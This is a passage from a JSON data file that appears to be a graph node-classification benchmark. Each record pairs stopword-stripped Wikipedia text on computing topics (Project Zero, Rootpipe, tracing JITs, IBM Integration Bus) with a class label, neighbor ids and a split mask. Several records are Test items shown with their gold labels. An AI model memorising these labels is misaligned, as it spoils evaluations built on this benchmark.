formally disclosed malcon 2011 quarterly journal collaboration various hacker groups objective helping coders understand art behind malcoding offensive defense security journal also seen remarkable significant point history evolution hackers cyber warfare capabilities india",
    "neighbors": [
      7809,
      9089,
      2275,
      5891,
      8805,
      7228,
      10894,
      1938,
      3796,
      4117,
      7449,
      7515,
      4956,
      10110
    ],
    "mask": "Test"
  },
  {
    "node_id": 6474,
    "label": 4,
    "text": "Project_Zero:project zero project zero team security analysts employed google tasked finding zero-day vulnerabilities secret hackable bugs exploited criminals state-sponsored hackers intelligence agencies announced 15th july 2014 finding number flaws software used many end-users researching problems critical heartbleed vulnerability google decided form full-time team dedicated finding vulnerabilities google software software used users new project announced 15 july 2014 google security blog launched one principal innovations project zero provided strict 90-day disclosure deadline along publicly visible bugtracker vulnerability disclosure process documented idea project zero traced back 2010 establishment fits larger trend google counter-surveillance initiatives wake 2013 global surveillance disclosures edward snowden team formerly headed chris evans previously head google chrome security team subsequently joined tesla motors notable members include security researchers ben hawkes ian beer tavis ormandy hawkes eventually became team manager team focus finding bugs novel attacks also researching publicly documenting flaws could exploited practice done ensure defenders sufficient understanding attacks team keeps extensive research blog articles describe individual attacks detail bugs found project zero team reported manufacturer made publicly visible patch released 90 days passed without patch released 90-day-deadline google way implementing responsible disclosure giving software companies 90 days fix problem informing public users take necessary steps avoid attacks cases team discloses flaws even updates fixes could released leaving users compromised system vulnerable one first project zero reports attracted attention involved flaw allowed hackers take control software running safari browser efforts team specifically beer cited apple brief note thanks 30 september 2014 google detected security flaw within windows 8.1 system call ntapphelpcachecontrol allows normal user gain administrative access microsoft notified problem immediately fix problem within 90 days meant information bug made publicly available 29 december 2014 releasing bug public elicited response microsoft working problem 9th march 2015 google project zero blog posted guest post disclosed previously known hardware flaw commonly deployed dram called row hammer could exploited escalate privileges local users post spawned large quantity follow-up research academic hardware community 19 february 2017 google discovered flaw within cloudflare reverse proxies caused edge servers run past end buffer return memory contained private information http cookies authentication tokens http post bodies sensitive data data cached search engines member project zero team referred flaw cloudbleed 27 march 2017 tavis ormandy project zero discovered vulnerability popular password manager lastpass 31 march 2017 lastpass announced fixed problem project zero involved discovering meltdown spectre vulnerabilities affecting many modern cpus discovered mid-2017 disclosed early january 2018 issue discovered jann horn independently researchers reported security flaw scheduled published 9 january 2018 moving date growing speculation 18 april 2019 project zero discovered bug apple imessage wherein certain malformed message could cause springboard ... crash respawn repeatedly causing ui displayed phone stop responding input would completely crash iphone ui making inoperable.this bug would persist even hard reset flaw also affected imessage mac different results apple fixed bug within 90 day period project zero released",
    "neighbors": [
      9732,
      4374,
      7965,
      3619,
      5028,
      3495,
      8231,
      297,
      5547,
      9518,
      7601,
      10110,
      6074,
      10190,
      7893,
      1623,
      4318,
      1776,
      4853,
      119,
      1912,
      8956,
      7678
    ],
    "mask": "Test"
  },
  {
    "node_id": 6475,
    "label": 4,
    "text": "American_Society_of_Digital_Forensics_&_eDiscovery:american society digital forensics amp ediscovery american society digital forensics ediscovery asdfed national professional association organized 501c3 profit organization organisations stated aims promote field digital forensics ediscovery asdfed founded georgia not-for-profit corporation currently publishes technical bulletins newsletters online news announcements hold national meetings seminars conferences organisation composed professionals legal technology litigation support professions society regional chapters across united states including atlanta chicago san diego new york city washington d.c.. asdfed ’ first chapter launched atlanta georgia chapter ’ leadership team composed president senior vice president least one vice president secretary treasurer end chapter president term remains chapter board additional year national asdfed organization composed three separate distinctive entities first board directors responsible overall guidance direction organization fiscal oversight second chapter support center provides membership packets support chapter third national leadership assembly nla nla composed current president senior vice president chapter primary charge nla updating revising asdfed common body knowledge first years organisation appointed steering committee members included",
    "neighbors": [
      2437,
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      5284,
      11182,
      10290,
      4789,
      1975,
      8635,
      830,
      2494,
      7369,
      10189,
      4049,
      4834,
      5475,
      7525,
      9319,
      7160,
      11642
    ],
    "mask": "Test"
  },
  {
    "node_id": 6476,
    "label": 6,
    "text": "Program_Files:program files program files directory name standard folder microsoft windows operating systems applications part operating system conventionally installed typically application installed 'program files directory subdirectory application-specific resources shared resources example resources used multiple applications one company typically stored nowiki /nowiki common program files nowiki /nowiki directory standard windows installation 'program files directory codice_1 localized equivalent thereof 'common program files localized equivalent thereof subdirectory 'program files windows vista later paths 'program files 'common program files directories localized disk instead localized names ntfs junction points non-localized locations additionally windows shell localizes name program files folder depending system user interface display language 'program files 'common program files moved system startup actual paths 'program files 'common program files loaded windows registry stored codice_2 codice_3 values codice_4 made accessible rest system via volatile environment variables codice_5 codice_6 applications also obtain locations paths querying codice_7 using codice_8 windows management instrumentation querying shell using csidls codice_9 localization-independent methods x86-64 ia-64 versions windows two folders application files program files folder serves default installation target 64-bit programs program files x86 folder default installation target 32-bit programs need wow64 emulation layer 64-bit windows versions also codice_10 environment variable dirids csidls different 32-bit 64-bit environments apis merely return different results depending whether calling process emulated backwards compatible 8.3 limitations old file allocation table filenames names 'program files 'program files x86 'common program files shortened system codice_11 codice_12 n digit sequence number clean install 1 1 2 'program files 'program files x86 present windows installed ntfs volume default 'program files folder modified members 'administrators user groups issue programs created windows 9x operating systems file system security programs could therefore also store data 'program files programs store data 'program files usually run correctly windows nt systems normal user privileges unless security lowered affected subdirectories windows vista addressed issue introducing file registry virtualization",
    "neighbors": [
      1,
      7173,
      9739,
      2066,
      7699,
      5655,
      537,
      10779,
      10781,
      10273,
      9762,
      6181,
      8231,
      3630,
      6705,
      7218,
      8757,
      2623,
      2113,
      7234,
      2638,
      10338,
      3175,
      617,
      8815,
      9840,
      6268,
      1148,
      3197,
      6787,
      6797,
      2193,
      7313,
      10900,
      6815,
      5793,
      6818,
      4771,
      6821,
      7847,
      6827,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      4289,
      9932,
      10957,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      5356,
      9964,
      5358,
      1776,
      2805,
      249,
      4356,
      11524,
      1798,
      1801,
      782,
      6415,
      6926,
      8976,
      11539,
      8988,
      11549,
      5406,
      7970,
      2339,
      6950,
      1832,
      3886,
      7983,
      3890,
      309,
      8501,
      5948,
      321,
      8514,
      4423,
      9033,
      2380,
      7505,
      9044,
      11605,
      344,
      11103,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      8576,
      3457,
      3470,
      1935,
      5518,
      3477,
      407,
      409,
      8098,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      3522,
      453,
      9166,
      466,
      4051,
      11221,
      1499,
      7134,
      5600,
      5090,
      995,
      7653,
      8681,
      9194,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6477,
    "label": 9,
    "text": "Tracing_just-in-time_compilation:tracing just-in-time compilation tracing just-in-time compilation technique used virtual machines optimize execution program runtime done recording linear sequence frequently executed operations compiling native machine code executing opposed traditional just-in-time jit compilers work per-method basis just-in-time compilation technique increase execution speed programs compiling parts program machine code runtime one way categorize different jit compilers compilation scope whereas method-based jit compilers translate one method time machine code tracing jits use frequently executed loops unit compilation tracing jits based assumptions programs spend time loops program hot loops subsequent loop iterations often take similar paths virtual machines tracing jit often mixed-mode execution environments meaning either interpreter method compiler addition tracing jit tracing jit compiler goes various phases runtime first profiling information loops collected hot loop identified special tracing mode entered records executed operations loop sequence operations called trace trace optimized compiled machine code trace loop executed compiled trace called instead program counterpart steps explained detail following goal profiling identify hot loops often done counting number iterations every loop count loop exceeds certain threshold loop considered hot tracing mode entered tracing phase execution loop proceeds normally addition every executed operation recorded trace recorded operations often stored form intermediate representation tracing follows function calls leads inlined trace tracing continues loop reaches end jumps back start since trace recorded following one concrete execution path loop later executions trace diverge path identify places happen special guard instructions inserted trace one example place statements guard quick check determine whether original condition still true guard fails execution trace aborted since tracing done execution trace made contain runtime information e.g type information information later used optimization phase increase code efficiency traces easy optimize since represent one execution path means control flow exists needs handling typical optimizations include constant-subexpression elimination dead-code elimination register allocation invariant-code motion constant folding escape analysis optimization trace turned machine code similarly optimization easy due linear nature traces trace compiled machine code executed subsequent iterations loop trace execution continues guard fails whereas idea jits reaches back 1960s tracing jits become used often recently first mention idea similar today idea tracing jits 1970 observed compiled code could derived interpreter run-time simply storing actions performed interpretation first implementation tracing dynamo software dynamic optimization system capable transparently improving performance native instruction stream executes processor native instruction stream interpreted hot instruction sequence found sequence optimized version generated cached executed dynamo later extended dynamorio one dynamorio-based project framework interpreter construction combines tracing partial evaluation used dynamically remove interpreter overhead language implementations 2006 hotpathvm first tracing jit compiler high-level language developed vm capable dynamically identifying frequently executed bytecode instructions traced compiled machine code using static single assignment ssa construction motivation hotpathvm efficient jvm resource constrained mobile devices another example tracing jit tracemonkey one mozilla ’ javascript implementations firefox 2009 tracemonkey compiles frequently executed loop traces dynamic language javascript run-time specialize generated code actual dynamic types occurring path another project utilizes tracing jits pypy enables use tracing jits language implementations written pypy translation toolchain thus improving performance program executed using interpreter possible tracing interpreter instead program executed interpreter tracing jits also explored microsoft spur project common intermediate language cil spur generic tracer cil also used trace javascript implementation consider following python program computes sum squares successive whole numbers sum exceeds 100000 def square x 0 0 true trace program could look something like note function call codice_1 inlined trace statement turned codice_2",
    "neighbors": [
      1409,
      5892,
      7173,
      4112,
      10013,
      1952,
      8609,
      5154,
      7462,
      10537,
      814,
      2620,
      9152,
      6478,
      10703,
      3413,
      5078,
      8280,
      9432,
      3553,
      8037,
      10470,
      5872,
      9714,
      2808,
      11644,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 6478,
    "label": 9,
    "text": "Extended_basic_block:extended basic block computing extended basic block collection basic blocks code within program certain properties make highly amenable optimizations many compiler optimizations operate extended basic blocks extended basic block maximal collection basic blocks many local optimizations operate basic blocks easily extended operate extended basic blocks example common subexpression elimination removes duplicate expressions simplest form local optimization operating basic blocks",
    "neighbors": [
      7940,
      6477,
      3854
    ],
    "mask": "None"
  },
  {
    "node_id": 6479,
    "label": 1,
    "text": "Vectorwise:vectorwise actian vector formerly known vectorwise sql relational database management system designed high performance analytical database applications published record breaking results transaction processing performance council tpc-h benchmark database sizes 100 gb 300 gb 1 tb 3 tb non-clustered hardware vectorwise originated x100 research project carried within centrum wiskunde informatica cwi dutch national research institute mathematics computer science 2003 2008 spun start-up company 2008 acquired ingres corporation 2011 released commercial product june 2010 initially 64-bit linux platform later also windows starting 3.5 release april 2014 product name shortened vector june 2014 actian vortex announced clustered mpp version vector working hadoop storage hdfs actian vortex later renamed actian vector hadoop basic architecture design principles x100 engine vectorwise database well described two phd theses vectorwise founders marcin żukowski balancing vectorized query execution bandwidth-optimized storage sandor héman updating compressed column stores supervision another founder professor peter boncz x100 engine integrated ingres sql front-end making database operatable using ingres sql syntax ingres set client dba tools query execution architecture makes use vectorized query execution processing chunks cache-fitting vectors data allows involve principles vector processing single instruction multiple data simd perform operation multiple data simultaneously exploit data level parallelism modern hardware also reduces overheads found traditional row-at-a-time processing found rdbmses database storage compressed column-oriented format scan-optimised buffer manager actian vortex hdfs proprietary format used loading big amounts data supported direct appends stable storage small transactional updates supported patent-pending positional delta trees pdts specialized b-tree-like structures indexed differences top stable storage seamlessly patched scans transparently propagated stable storage background process method storing differences patch-like structures rewriting stable storage bulk made possible work filesystem like hdfs files append-only comparative transaction processing performance council tpc-h performance test monetdb carried original creator centrum wiskunde informatica cwi 2003 showed room improvement performance analytical database result cwi researchers proposed new architecture using pipelined query processing vectorised processing improve performance analytical queries led creation x100 project intention designing new kernel monetdb called monetdb/x100 x100 project team 2007 damon best paper award paper vectorized data processing cell broadband engine well 2008 damon best paper award paper dsm vs. nsm cpu performance tradeoffs block-oriented query processing august 2009 originators x100 project ten year best paper award 35th international conference large data bases vldb 1999 paper database architecture optimized new bottleneck memory access recognised vldb project team made great progress implementing ideas contained paper previous 10 years central premise paper traditional relational database systems designed late 1970s early 1980s time database performance dictated time required read write data hard disk time available cpu relatively slow main memory relatively small little data could loaded memory time time hardware improved cpu speed memory size doubling roughly every two years accordance moore ’ law design traditional relational database systems adapted cwi research team described improvements database code data structures make best use modern hardware 2008 x100 project spun monetdb separate project right renamed vectorwise co-founders included peter a. boncz marcin żukowski june 2010 vectorwise technology officially announced ingres corporation release ingres vectorwise 1.0 march 2011 vectorwise 1.5 released publishing record breaking result tpc-h 100 gb benchmark new features included parallel query execution single query executed multiple cpu cores improved bulk loading enhanced sql support june 2011 vectorwise 1.6 released publishing record breaking results tpc-h 100 gb 300 gb 1 tb non-clustered benchmark december 2011 vectorwise 2.0 released new sql support analytical functions rank percentile enhanced date time timestamp datatypes support disk spilling hash joins aggregation june 2012 vectorwise 2.5 released release storage format reorganized allow storing database multiple location background update propagation mechanism pdts stable storage enhanced allow rewriting changed blocks instead full rewrites new patented predictive buffer manager pbm introduced march 2013 vectorwise 3.0 released new features included efficient storage engine support data types analytical sql functions enhanced ddl features improved monitoring profiling accessibility march 2014 actian vector 3.5 released new rebranded shortened name new features included support partitioned tables improved disk spilling online backup capabilities improved sql support e.g codice_1 dml operations codice_2 codice_3 window aggregation functions march 2015 actian vector 4 released june 2014 hadoop summit 2014 san jose actian announced actian vortex clustered mpp version vector level sql support working hadoop storage directly hdfs actian vortex since released later renamed actian vector hadoop non-clustered actian vector releases also updated match actian vector hadoop 4 released december 2015 april 2019 actian avalanche released cloud option high-performance actian vector following releases available supported actian may 2019",
    "neighbors": [
      3,
      9893,
      7767,
      9126,
      9286,
      5612,
      10413,
      10286,
      6383,
      1776,
      7983,
      10734,
      823,
      6780
    ],
    "mask": "Test"
  },
  {
    "node_id": 6480,
    "label": 7,
    "text": "Oracle_Clusterware:oracle clusterware oracle clusterware cross-platform cluster software required run real application clusters rac option oracle database provides basic clustering services operating-system level enable oracle database software run clustering mode earlier versions oracle release 9i earlier rac required vendor-supplied clusterware like sun cluster veritas cluster server except running linux microsoft windows oracle clusterware software enables nodes communicate allowing form cluster nodes behaves single logical server oracle clusterware run cluster ready services crs consisting two key components oracle cluster registry ocr records maintains cluster node membership information voting disk polls consistent heartbeat information nodes cluster running acts tiebreaker communication failures crs service four components handling variety functions cluster ready services daemon crsd oracle cluster synchronization service daemon ocssd event volume manager daemon evmd oracle process clusterware daemon oprocd failure death crs daemon cause node failure triggers automatic reboots nodes avoid corruption data due possible failure communication nodes also known fencing crs daemon runs root super user unix platforms runs service windows platforms following functions provided oracle cluster ready services daemon crsd oracle cluster synchronization services daemon ocssd provides basic ‘ group services ’ support group services distributed group membership system allows applications coordinate activities achieve common result provides synchronization services nodes access node membership information well enabling basic cluster services including cluster group services cluster locking also run without integration vendor clusterware failure ocssd causes machine reboot avoid split-brain situation also required single instance configuration automatic storage management asm used asm new feature oracle 10g ocssd runs oracle user following functions provided oracle cluster synchronization services daemon ocssd third component ocs event volume management logger daemon evmd evmd spawns permanent child process called evmlogger generates events evmd child process ‘ evmlogger ’ spawns new children processes demand scans callout directory invoke callouts restart automatically failures death evmd process halt instance evmd runs oracle user oprocd provides server fencing solution oracle clusterware process monitor oracle clusterware uses hang check timer watchdog timer depending implementation cluster integrity oprocd locked memory runs real time process sleeps fixed time runs root user failure oprocd process causes node restart oprocd important even monitored process called oclsomon causes cluster node reboot oprocd hung references 1.http //docs.oracle.com/cd/b28359_01/rac.111/b28255/intro.htm babcheee",
    "neighbors": [
      11136,
      10340,
      5612,
      6797,
      7983,
      10640,
      4149,
      823,
      700
    ],
    "mask": "Test"
  },
  {
    "node_id": 6481,
    "label": 4,
    "text": "Altor_Networks:altor networks altor networks inc. juniper networks company provider security virtual data centers clouds company developed world ’ first firewall purpose-built virtual networks software security appliance runs virtualized environment enforces security policy per-virtual-machine basis data center administrators could pinpoint broad range virtual network security comprises create roles-based security policies security policies could continuously enforced individual virtual machines vm even moved throughout virtualized data center headquartered redwood shores california united states altor founded 2007 security networking experts check point software cisco oracle corporation received funding accel partners dag ventures foundation capital juniper networks december 6 2010 juniper networks announced acquired altor networks computer virtualization use mainframe computers since ibm vm/370 platform release early 1970s vm technology became widely available release vmware workstation 1999 vmware server line 2001 estimated 50 workloads would running inside virtualized environments 2012 whenever virtualization technology includes hypervisor virtual network created within hypervisor layer transparently network virtual machines operating single virtualized environment virtual network provides benefits administrative responsibilities physical network addition new challenges founders altor networks became aware early adoption virtualization technologies data centers accelerating many years several problems virtual network security particular became apparent decided way address challenges provide solution operated entirely within virtualized environment purpose-built appliance provide firewalling security services directly inside virtual network without recourse external hardware firewalls intrusion detection appliances associated vlan rerouting virtual network physical network back altor released virtual network security analyzer vnsa tool monitor analyze virtual network traffic march 2008 followed altor vf 1.0 included vnsa module october 2008 integrated signature-based network intrusion detection incorporated altor vf 3.0 release september 2009 release altor v4.0 leverages virtual machine introspection bring visibility internal virtual machine states compliance assessment automated security enforcement ator networks offers virtual security appliance use within vmware esx ongoing efforts add support xen/citrix microsoft hyperv/viridian platforms 40,000 firewalls help please sans intrusion detection faqs intrusion protection detection within virtual environment",
    "neighbors": [
      8998,
      9927,
      6985,
      6153,
      939,
      7217,
      10291,
      9655,
      8668
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6482,
    "label": 2,
    "text": "Event_monitoring:event monitoring computer science event monitoring process collecting analyzing signaling event occurrences subscribers operating system processes active database rules well human operators event occurrences may stem arbitrary sources software hardware operating systems database management systems application software processors event monitoring may use time series database event monitoring makes use logical bus transport event occurrences sources subscribers event sources signal event occurrences event subscribers event subscribers receive event occurrences event bus distributed set physical nodes standalone computer systems typical examples event buses found graphical systems x window system microsoft windows well development tools sdt event collection process collecting event occurrences filtered event log analysis filtered event log logged event occurrences meaningful use future implies event occurrences removed filtered event log useless future event log analysis process analyzing filtered event log aggregate event occurrences decide whether event occurrence signalled event signalling process signalling event occurrences event bus something monitored denoted monitored object example application operating system database hardware etc monitored objects monitored object must properly conditioned event sensors enable event monitoring object must instrumented event sensors monitored object event sensors sensors signal event occurrences whenever event occurs whenever something monitored probe effect must managed discussed gait object monitored behavior changed particular concurrent system processes run parallel poses particular problem reason whenever sensors introduced system processes may execute different order cause problem example trying localize fault monitoring system change behavior way fault may result failure essence fault masked monitoring system probe effect difference behavior monitored object un-instrumented counterpart according schütz avoid compensate ignore probe effect critical real-time system timeliness i.e. ability system meet time constraints deadlines significant avoidance option example instrument system testing remove instrumentation delivery invalidates results testing based complete system less critical real-time system e.g. media-based systems compensation acceptable example performance testing non-concurrent systems ignorance acceptable since behavior respect order execution left unchanged event log analysis known event composition active databases chronicle recognition artificial intelligence real-time logic evaluation real-time systems essentially event log analysis used pattern matching filtering event occurrences aggregation event occurrences composite event occurrences commonly dynamic programming strategies algorithms employed save results previous analyses future use since example pattern may match event occurrences several consecutive analysis processing contrast general rule processing employed assert new facts facts cf inference engine usually based backtracking techniques event log analysis algorithms commonly greedy example composite said occurred fact never revoked may done backtracking based algorithm several mechanisms proposed event log analysis finite state automata petri nets procedural either based imperative programming language object-oriented programming languages modification boyer–moore string search algorithm simple temporal networks",
    "neighbors": [
      4033,
      4423,
      6797,
      11533,
      7983,
      2901,
      1211
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6483,
    "label": 7,
    "text": "IBM_Integration_Bus:ibm integration bus ibm app connect enterprise abbreviated ibm ace formerly known ibm integration bus websphere message broker ibm integration broker websphere product family allows business information flow disparate applications across multiple hardware software platforms rules applied data flowing message broker route transform information product enterprise service bus supplying communication channel applications services service-oriented architecture ibm ace provides capabilities build solutions needed support diverse integration requirements set connectors range data sources including packaged applications files mobile devices messaging systems databases benefit using ibm ace tool enables existing applications web services without costly legacy application rewrites ace avoids point-to-point strain development resources connecting application service multiple protocols including soap http jms modern secure authentication mechanisms including ability perform actions behalf masquerading delegate users mq http soap nodes supported ldap x-auth o-auth two-way ssl major focus ibm ace latest release capability product runtime fully hosted cloud hosting runtime cloud provides certain advantages potential cost savings compared hosting runtime premises simplifies maintenance application os-level patches sometimes disruptive business continuity also cloud hosting ibm ace runtime allows easy expansion capacity adding horsepower cpu configuration cloud environment adding additional nodes active-active configuration another advantage maintaining ace runtimes cloud ability configure access ace functionality separate apart internal network using datapower api connect devices allows people services public internet access enterprise service bus without passing internal network secure configuration esb deployed internal premises network ibm ace embeds common language runtime invoke .net logic part integration also includes full support visual studio development environment including integrated debugger code templates ibm integration bus includes comprehensive set patterns samples demonstrate bi-directional connectivity microsoft dynamics crm msmq several improvements made current release among ability configure runtime parameters using property file part deployed artifacts contained bar file previously way configure runtime parameters run mqsi command command line new way configuration referred policy document created new policy editor policy documents stored source code control system different policy exist different environments dev int qa prod ibm ace compatible several virtualization platforms right out-of-the-box docker prime example ace download global docker repository runtime ibm ace run locally ace administrative console built right runtime docker image active local configuration administration commands needed fully activate message flow deploy bar file fact construct message flows microservices package microservices docker deployable object directly message flows bar files contain policy files node configuration automatic little human intervention needed complete application deployment ibm represents following features key differentiators ibm ace product compared industry products provide services enterprise service bus ibm delivers iib software either traditional software install local premises premise ibm cloud private ibm administered cloud environment integration bus cloud environment reduces capital expenditures increases application hardware availability offloads skills managing integration bus environment ibm cloud engineers promotes ability end users focus developing solutions rather installing configuring managing iib software offering intended compatible on-premises product within constraints cloud environment users use development tooling cloud on-premises software assets generated deployed either originally product developed neon new era networks inc. company acquired sybase 2001 product later re-branded ibm product called 'mqseries integrator 'mqsi short versions mqsi ran version 2.0 product added websphere family re-branded 'websphere mq integrator version 2.1 2.1 version numbers became synchronized rest websphere family jumped version 5.0 name changed 'websphere business integration message broker wbimb version development environment redesigned using eclipse support web services integrated product since version 6.0 product known 'websphere message broker websphere message broker version 7.0 announced october 2009 websphere message broker version 8.0 announced october 2011 april 2013 ibm announced websphere message broker product undergoing another rebranding name change ibm integration bus version 9 includes new nodes decision service node enables content based routing based rules engine requires ibm websphere operational decision management product ibm websphere enterprise service bus product discontinued release ibm integration bus ibm offering transitional licenses move ibm integration bus websphere message broker transfer license websphere enterprise service bus enables customers exchange websphere enterprise service bus license entitlements websphere message broker license entitlements following license transfer entitlement use websphere enterprise service bus reduced cease reflects websphere enterprise service bus license entitlements relinquished exchange ibm announced impact 2013 wesb end-of-life five years feature development wesb product occur ibm integration bus consists following components soa developer defines message flows ibm integration toolkit including number message flow nodes represents set actions define processing step way message flow nodes joined together determine processing steps carried order conditions message flow includes input node provides source messages processed processed one ways optionally deliver one output nodes message received bit stream without representational structure format converted parser tree structure used internally message flow message delivered final destination converted back bit stream ibm integration bus supports wide variety data formats including standards-based formats xml dfdl json industry formats hl7 edi swift custom formats comprehensive range operations performed data including routing filtering enrichment multicast publish-subscribe sequencing aggregation flexible integration capabilities able support customer choice solution architecture including service-oriented event-oriented data-driven file-based batch real-time ibm integration bus unifies business process management grid providing workhorse behind something taking directions bpm tooling tells ibm integration bus ibm integration bus includes set performance monitoring tools visually portray current server throughput rates showing various metrics elapsed cpu time ways immediately draw attention performance bottlenecks spikes demand drill granular details rates individual connectors tools enable correlate performance information configuration changes quickly determine performance impact specific configuration changes version 7 earlier primary way general text binary messages modeled parsed container called message set associated 'mrm parser version 8 onwards messages modeled parsed using new open technology called dfdl open grid forum ibm strategic technology modeling parsing general text binary data mrm parser message sets remain fully supported part product order use message sets developer must enable disabled default encourage adoption dfdl technology ibm integration bus supports policy-driven traffic shaping enables greater visibility system administrators operational control workload traffic shaping enables system administrators meet demands quantity new endpoints mobile cloud applications exponentially increases adjusting available system resources meet new demand delay redirect traffic cope load spikes traffic monitoring enables notifications system administrators business stakeholders increases business awareness enables trend discovery ibm integration bus reduces cost complexity systems unifying method company uses implement interfaces disparate systems integration node runtime forms enterprise service bus service-oriented architecture efficiently increasing flexibility connecting unlike systems unified homogeneous architecture key feature ibm integration bus ability abstract business logic away transport protocol specifics ibm integration bus toolkit enables developers graphically design mediations known message flows related artifacts developed resources packaged broker archive bar file deployed integration node runtime environment point integration node able continually process messages according logic described message flow wide variety data formats supported may modeled using standard xml schema dfdl schema modeling developer create transformations various formats using nodes supplied toolkit either graphically using mapping node programmatically using compute node using java esql .net ibm integration bus message flows used service-oriented architecture properly designed middleware analysts integrated event-driven soa schemas sometimes referred soa 2.0 businesses rely processing events might part business process issuing trade order purchasing insurance policy reading data using sensor monitoring information gathered infrastructure performance websphere message broker includes rich complex-event-processing capabilities enable analysis events perform validation enrichment transformation intelligent routing messages based set business rules developer creates message flows cyclical workflow probably agile software development developers create message flow generate bar file deploy message flow contained bar file test message flow repeat necessary achieve reliable functionality based earnings reported ibm 1q13 annualized revenue ibm middleware software unit increased 14 billion 7 billion 2011 license maintenance revenue ibm middleware products reached 7 billion 2011 2012 ibm expected increase market share total market increase ten percent worldwide application infrastructure middleware software market grew 9.9 percent 2011 19.4 billion according gartner gartner reported ibm continues number one growing key areas including enterprise service bus suites message oriented middleware market transaction processing monitor market integration appliances ibm publishes performance reports websphere message broker provide sample throughput figures performance varies depending message sizes message volumes processing complexity complexity message transformations system capacities cpu memory network etc software version patch levels configuration settings factors published tests demonstrate message rates excess 10,000 per second particular configurations version 8 onwards new global cache feature enhances overall performance capability throughput rates cache rides top ibm websphere extremescale bundled ibm integration bus dedicated message flow node available use message flows access cache achieved compute nodes languages like java esql .net developer choose many pre-designed message flow 'nodes used build message flow nodes different purposes nodes map data one format another instance cobol copybook canonical xml nodes evaluate content data route flow differently based certain criteria many types node used developing message flows following node transformation technology options available ibm integration bus distributed systems localized following cultures pattern captures commonly recurring solution problem example request-reply pattern specification pattern describes problem addressed problem important constraints solution patterns typically emerge common usage application particular product technology pattern used generate customized solutions recurring problem efficient way pattern recognition development process called service-oriented modeling version 7 introduced patterns patterns cover range categories including file processing application integration message based integration currently available platforms ibm integration bus",
    "neighbors": [
      4107,
      6797,
      5523,
      1304,
      10020,
      10236,
      5677,
      7983,
      1076,
      823,
      8122,
      11339,
      3927,
      2910,
      479,
      863,
      4194,
      3558,
      5356,
      5612,
      499,
      8700,
      10486,
      1399,
      2168,
      6522,
      3323,
      8188
    ],
    "mask": "Test"
  },
  {
    "node_id": 6484,
    "label": 4,
    "text": "Rootpipe:rootpipe rootpipe security vulnerability found versions os x allows privilege escalation whereby user administrative rights program executed administrative user obtain superuser root access considered problematic first user account created os x furnished administrator rights default leveraging security vulnerabilities system unpatched web browser rootpipe could used attacker help gain complete control operating system emil kvarnhammar truesec security firm credited discovery says found vulnerability several days binary analysis recommends creating account without administrative privileges used normal everyday work using filevault older exploit issue later published exploit-db suggesting issue dates back june 2010 appears exploit used author presentation trusteer rapport 44con 2011 vulnerability reported apple inc. october 2014 reported present os x versions 10.7.5 10.8.2 10.9.5 10.10.2 os x 10.10.3 officially designated patched apple kvarnhammar crediting patrick wardle blogged vulnerability still present version 1 july 2015 kvarnhammer noted additional restrictions introduced os x 10.10.4 adding comment two days later believed then-current versions os x 10.9 security update 2015-005 10.10 safe exploit november 2017 similar vulnerability revealed allowed logging root password",
    "neighbors": [
      1024,
      8320,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      10003,
      10132,
      4117,
      8726,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      8489,
      11052,
      9518,
      9904,
      7601,
      1970,
      9395,
      5172,
      8886,
      1337,
      441,
      1979,
      700,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      4054,
      7639,
      8664,
      857,
      1882,
      4314,
      7515,
      9435,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      9082,
      2815
    ],
    "mask": "Test"
  },
  {
    "node_id": 6485,
    "label": 3,
    "text": "Hudson_Soft_HuC6280:hudson soft huc6280 huc6280 8-bit microprocessor japanese company hudson soft improved version wdc 65c02 cpu upgraded cmos version popular nmos-based mos technology 6502 8-bit cpu manufactured hudson seiko epson notable product using huc6280 nec turbografx-16 video game console huc6280 contains 65c02 core several additional instructions internal peripheral functions interrupt controller memory management unit timer 8-bit parallel i/o port programmable sound generator psg processor operates two speeds 1.79 mhz 7.16 mhz huc6280 64 kb logical address space 2 mb physical address space access entire memory space huc6280 uses mmu memory management unit splits memory space segments 8 kb logical address space split follows logical 8 kb segment page associated 8-bit register mpr0-7 contains index 8 kb segment bank physical memory map page two special instructions used access registers tami transfer content accumulator mpr register 0-7 tmai transfer mpr register accumulator programmable sound generator psg provides 6 sound channels conveniently paired according functionality provide waveform playback common allows 32 byte 5 bit unsigned linear sample played back selected frequencies frequency modulation takes one step allowing playback frequency dynamically adjusted according specified pattern white noise used simulate percussion instruments effects explosions means pseudo-random square wave alternatively channel individually switched direct d/a mode programmer send data directly sound mixer allowing complex sound patterns generated speech inevitably requires programming effort cpu time",
    "neighbors": [
      11395,
      10767,
      5400,
      664,
      10784,
      4385,
      7589,
      5933,
      11054,
      3010,
      3157,
      10969,
      5862,
      10351,
      1776,
      5617,
      7281,
      7282,
      7284
    ],
    "mask": "Test"
  },
  {
    "node_id": 6486,
    "label": 2,
